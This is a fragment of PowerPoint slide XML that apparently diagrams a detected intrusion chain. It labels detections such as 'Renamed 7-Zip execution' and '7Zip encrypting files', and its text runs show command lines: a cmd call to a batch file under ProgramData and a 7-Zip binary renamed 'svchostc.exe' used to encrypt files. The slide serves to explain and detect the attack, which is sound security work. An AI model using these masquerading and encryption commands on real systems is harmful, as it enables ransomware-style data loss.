            <a:xfrm>
              <a:off x="14518214" y="3850697"/>
              <a:ext cx="178590" cy="178538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 178590 w 178590"/>
                <a:gd name="connsiteY0" fmla="*/ 89243 h 178538"/>
                <a:gd name="connsiteX1" fmla="*/ 89295 w 178590"/>
                <a:gd name="connsiteY1" fmla="*/ 178538 h 178538"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 178590"/>
                <a:gd name="connsiteY2" fmla="*/ 89243 h 178538"/>
                <a:gd name="connsiteX3" fmla="*/ 89295 w 178590"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 178538"/>
                <a:gd name="connsiteX4" fmla="*/ 178590 w 178590"/>
                <a:gd name="connsiteY4" fmla="*/ 89243 h 178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590" h="178538">
                  <a:moveTo>
                    <a:pt x="178590" y="89243"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="178590" y="138572"/>
                    <a:pt x="138624" y="178538"/>
                    <a:pt x="89295" y="178538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39966" y="178538"/>
                    <a:pt x="0" y="138572"/>
                    <a:pt x="0" y="89243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="39966"/>
                    <a:pt x="39966" y="0"/>
                    <a:pt x="89295" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138624" y="0"/>
                    <a:pt x="178590" y="39966"/>
                    <a:pt x="178590" y="89243"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="13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SK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9F68437-6746-C2CF-578A-1E1F01BF4D44}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14027225" y="3493572"/>
              <a:ext cx="1160569" cy="1339172"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY0" fmla="*/ 267885 h 1339172"/>
                <a:gd name="connsiteX1" fmla="*/ 401748 w 1160569"/>
                <a:gd name="connsiteY1" fmla="*/ 446422 h 1339172"/>
                <a:gd name="connsiteX2" fmla="*/ 535664 w 1160569"/>
                <a:gd name="connsiteY2" fmla="*/ 619147 h 1339172"/>
                <a:gd name="connsiteX3" fmla="*/ 535664 w 1160569"/>
                <a:gd name="connsiteY3" fmla="*/ 982032 h 1339172"/>
                <a:gd name="connsiteX4" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY4" fmla="*/ 1026653 h 1339172"/>
                <a:gd name="connsiteX5" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY5" fmla="*/ 1026653 h 1339172"/>
                <a:gd name="connsiteX6" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY6" fmla="*/ 982032 h 1339172"/>
                <a:gd name="connsiteX7" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY7" fmla="*/ 937411 h 1339172"/>
                <a:gd name="connsiteX8" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY8" fmla="*/ 937411 h 1339172"/>
                <a:gd name="connsiteX9" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY9" fmla="*/ 848116 h 1339172"/>
                <a:gd name="connsiteX10" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY10" fmla="*/ 848116 h 1339172"/>
                <a:gd name="connsiteX11" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY11" fmla="*/ 803495 h 1339172"/>
                <a:gd name="connsiteX12" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY12" fmla="*/ 758875 h 1339172"/>
                <a:gd name="connsiteX13" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY13" fmla="*/ 758875 h 1339172"/>
                <a:gd name="connsiteX14" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY14" fmla="*/ 619147 h 1339172"/>
                <a:gd name="connsiteX15" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY15" fmla="*/ 446422 h 1339172"/>
                <a:gd name="connsiteX16" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY16" fmla="*/ 267885 h 1339172"/>
                <a:gd name="connsiteX17" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY17" fmla="*/ 0 h 1339172"/>
                <a:gd name="connsiteX18" fmla="*/ 892737 w 1160569"/>
                <a:gd name="connsiteY18" fmla="*/ 89295 h 1339172"/>
                <a:gd name="connsiteX19" fmla="*/ 1160569 w 1160569"/>
                <a:gd name="connsiteY19" fmla="*/ 133916 h 1339172"/>
                <a:gd name="connsiteX20" fmla="*/ 1160569 w 1160569"/>
                <a:gd name="connsiteY20" fmla="*/ 477112 h 1339172"/>
                <a:gd name="connsiteX21" fmla="*/ 1148262 w 1160569"/>
                <a:gd name="connsiteY21" fmla="*/ 479597 h 1339172"/>
                <a:gd name="connsiteX22" fmla="*/ 1044021 w 1160569"/>
                <a:gd name="connsiteY22" fmla="*/ 636859 h 1339172"/>
                <a:gd name="connsiteX23" fmla="*/ 1054473 w 1160569"/>
                <a:gd name="connsiteY23" fmla="*/ 688631 h 1339172"/>
                <a:gd name="connsiteX24" fmla="*/ 1024168 w 1160569"/>
                <a:gd name="connsiteY24" fmla="*/ 694750 h 1339172"/>
                <a:gd name="connsiteX25" fmla="*/ 919927 w 1160569"/>
                <a:gd name="connsiteY25" fmla="*/ 852012 h 1339172"/>
                <a:gd name="connsiteX26" fmla="*/ 969917 w 1160569"/>
                <a:gd name="connsiteY26" fmla="*/ 972698 h 1339172"/>
                <a:gd name="connsiteX27" fmla="*/ 978998 w 1160569"/>
                <a:gd name="connsiteY27" fmla="*/ 978821 h 1339172"/>
                <a:gd name="connsiteX28" fmla="*/ 977587 w 1160569"/>
                <a:gd name="connsiteY28" fmla="*/ 979106 h 1339172"/>
                <a:gd name="connsiteX29" fmla="*/ 873346 w 1160569"/>
                <a:gd name="connsiteY29" fmla="*/ 1136368 h 1339172"/>
                <a:gd name="connsiteX30" fmla="*/ 880413 w 1160569"/>
                <a:gd name="connsiteY30" fmla="*/ 1171373 h 1339172"/>
                <a:gd name="connsiteX31" fmla="*/ 811434 w 1160569"/>
                <a:gd name="connsiteY31" fmla="*/ 1223714 h 1339172"/>
                <a:gd name="connsiteX32" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY32" fmla="*/ 1277544 h 1339172"/>
                <a:gd name="connsiteX33" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY33" fmla="*/ 1339172 h 1339172"/>
                <a:gd name="connsiteX34" fmla="*/ 446368 w 1160569"/>
                <a:gd name="connsiteY34" fmla="*/ 1277544 h 1339172"/>
                <a:gd name="connsiteX35" fmla="*/ 0 w 1160569"/>
                <a:gd name="connsiteY35" fmla="*/ 579401 h 1339172"/>
                <a:gd name="connsiteX36" fmla="*/ 0 w 1160569"/>
                <a:gd name="connsiteY36" fmla="*/ 133916 h 1339172"/>
                <a:gd name="connsiteX37" fmla="*/ 267832 w 1160569"/>
                <a:gd name="connsiteY37" fmla="*/ 89295 h 1339172"/>
                <a:gd name="connsiteX38" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY38" fmla="*/ 0 h 1339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160569" h="1339172">
                  <a:moveTo>
                    <a:pt x="580284" y="267885"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="481679" y="267885"/>
                    <a:pt x="401748" y="347764"/>
                    <a:pt x="401748" y="446422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="401748" y="529434"/>
                    <a:pt x="458453" y="599531"/>
                    <a:pt x="535664" y="619147"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="535664" y="982032"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="535664" y="1006566"/>
                    <a:pt x="555751" y="1026653"/>
                    <a:pt x="580284" y="1026653"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="714200" y="1026653"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="738734" y="1026653"/>
                    <a:pt x="758821" y="1006566"/>
                    <a:pt x="758821" y="982032"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="957499"/>
                    <a:pt x="738734" y="937411"/>
                    <a:pt x="714200" y="937411"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="624905" y="937411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624905" y="848116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714200" y="848116"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="738734" y="848116"/>
                    <a:pt x="758821" y="828029"/>
                    <a:pt x="758821" y="803495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="778962"/>
                    <a:pt x="738734" y="758875"/>
                    <a:pt x="714200" y="758875"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="624905" y="758875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624905" y="619147"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="702116" y="599542"/>
                    <a:pt x="758821" y="529439"/>
                    <a:pt x="758821" y="446422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="347764"/>
                    <a:pt x="678943" y="267885"/>
                    <a:pt x="580284" y="267885"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="580284" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="671776" y="32590"/>
                    <a:pt x="776241" y="63873"/>
                    <a:pt x="892737" y="89295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="988728" y="110272"/>
                    <a:pt x="1078441" y="124552"/>
                    <a:pt x="1160569" y="133916"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1160569" y="477112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148262" y="479597"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1087004" y="505507"/>
                    <a:pt x="1044021" y="566163"/>
                    <a:pt x="1044021" y="636859"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1054473" y="688631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024168" y="694750"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="962910" y="720660"/>
                    <a:pt x="919927" y="781316"/>
                    <a:pt x="919927" y="852012"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="919927" y="899143"/>
                    <a:pt x="939031" y="941811"/>
                    <a:pt x="969917" y="972698"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="978998" y="978821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977587" y="979106"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="916329" y="1005016"/>
                    <a:pt x="873346" y="1065672"/>
                    <a:pt x="873346" y="1136368"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="880413" y="1171373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811434" y="1223714"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="780645" y="1243791"/>
                    <a:pt x="748183" y="1261812"/>
                    <a:pt x="714200" y="1277544"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="580284" y="1339172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446368" y="1277544"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174559" y="1151677"/>
                    <a:pt x="0" y="879345"/>
                    <a:pt x="0" y="579401"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="133916"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="82131" y="124553"/>
                    <a:pt x="171841" y="110272"/>
                    <a:pt x="267832" y="89295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="384325" y="63819"/>
                    <a:pt x="488793" y="32590"/>
                    <a:pt x="580284" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="13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SK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99D5721-362C-57EE-AD04-33D83B4BBCF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9510309" y="8786790"/>
            <a:ext cx="7872833" cy="834390"/>
            <a:chOff x="10921200" y="5294028"/>
            <a:chExt cx="7872833" cy="83439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3D17D7D-040C-3BF1-4A72-00EE7B762BF8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10921200" y="5294028"/>
              <a:ext cx="7872833" cy="834390"/>
              <a:chOff x="12435194" y="883208"/>
              <a:chExt cx="7872833" cy="834390"/>
            </a:xfrm>
            <a:effectLst/>
          </p:grpSpPr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4909197B-EC2E-2A19-5B11-97B56AB24CE1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12435194" y="914400"/>
                <a:ext cx="7872833" cy="703855"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0097A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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03776CF7-716B-550D-52BA-736594125297}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="883208"/>
                <a:ext cx="6966327" cy="834390"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" kern="0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Archive Utility (7Zip) encrypting files [E0613]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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E3BF048A-118B-7B9D-BA15-026FB6EFB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11077712" y="5369512"/>
              <a:ext cx="703855" cy="703855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C949800-953C-934F-256D-1642CE204CCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8957210" y="4289624"/>
            <a:ext cx="6330249" cy="853677"/>
            <a:chOff x="12435194" y="914400"/>
            <a:chExt cx="6330249" cy="853677"/>
          </a:xfrm>
        </p:grpSpPr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76918BDC-83C2-73E7-2A15-D63F1845A6EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12435194" y="914400"/>
              <a:ext cx="6330249" cy="853677"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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D0A0CF28-4B94-50AB-2790-5AC528248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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12682267" y="1081599"/>
              <a:ext cx="525438" cy="505978"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B6E284B-ABFA-F402-878E-E20186C2DD7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341701" y="914400"/>
              <a:ext cx="5423742" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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svchostc.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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od:orec</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/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E9C6E52-8A30-E1FE-2542-0535C23F8CB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9510309" y="5377067"/>
            <a:ext cx="7872833" cy="834390"/>
            <a:chOff x="10921200" y="5325220"/>
            <a:chExt cx="7872833" cy="83439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F3548C8-9F97-B14E-FB10-B2D7853C8E2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10921200" y="5325220"/>
              <a:ext cx="7872833" cy="834390"/>
              <a:chOff x="12435194" y="914400"/>
              <a:chExt cx="7872833" cy="834390"/>
            </a:xfrm>
            <a:effectLst/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rounded Rectangle 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C1851D7-C570-F17F-70EA-E8BFD849AB63}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12435194" y="970484"/>
                <a:ext cx="7872833" cy="703855"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0097A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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A1A8A36-6C51-2824-E192-78485C9F25E7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="914400"/>
                <a:ext cx="6966327" cy="834390"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" kern="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF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Renamed 7-Zip execution [A0444]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp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B30C4D5A-B4A9-9D5B-5692-C39015048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11077712" y="5400704"/>
              <a:ext cx="703855" cy="703855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7BECA52-8A38-F1AF-4877-945CB7FD33EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8237655" y="3229938"/>
            <a:ext cx="6432421" cy="853677"/>
            <a:chOff x="12435194" y="914400"/>
            <a:chExt cx="6432421" cy="853677"/>
          </a:xfrm>
        </p:grpSpPr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1D48D9C6-1301-9794-5B26-0A53A6A38487}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12435194" y="914400"/>
              <a:ext cx="6432421" cy="853677"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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pic>
          <p:nvPicPr>
            <p:cNvPr id="59" name="Graphic 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEBE343C-A7EB-7392-5F7D-9DC3B38B9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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12617637" y="1160488"/>
              <a:ext cx="592244" cy="361499"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09E52FA5-676C-DD60-972C-51F197C266B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341700" y="914400"/>
              <a:ext cx="5525915" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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cmd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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/c c:\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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programdata</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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\intel\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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gcc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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i.bat</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/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</p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64" name="Connector: Elbow 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA7424C6-DB3B-BB32-6A78-D02CB96199D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="32" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="8447234" y="4206486"/>
            <a:ext cx="600509" cy="419443"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="74" name="!!Connector: Elbow 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03952C4F-A87D-1881-8B65-5815C8E93FEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="8915061" y="7587345"/>
            <a:ext cx="796729" cy="449167"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100118"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="75" name="!!Connector: Elbow 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AB6461E-E947-659C-94A4-81EF5A68BB54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="8464097" y="8084153"/>
            <a:ext cx="1705330" cy="455841"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100098"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr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EDE50FC-A53E-D410-362F-B55AB9ED2121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8957210" y="6365345"/>
            <a:ext cx="8664388" cy="1309110"/>
            <a:chOff x="12435194" y="701826"/>
            <a:chExt cx="7236755" cy="1309110"/>
          </a:xfrm>
        </p:grpSpPr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B2683A2B-7140-8730-86D4-D6CAD9B8551C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12435194" y="701826"/>
              <a:ext cx="7037009" cy="1309110"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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B1510C8E-3030-037D-BB8D-5045A7202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rcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12676433" y="1076465"/>
              <a:ext cx="577281" cy="523610"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9772B2E9-9D1C-C500-8B3B-757764266DCD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341701" y="914400"/>
              <a:ext cx="6330248" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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svchostc.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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a -t7z -mx5 -</a:t>
              </a:r>
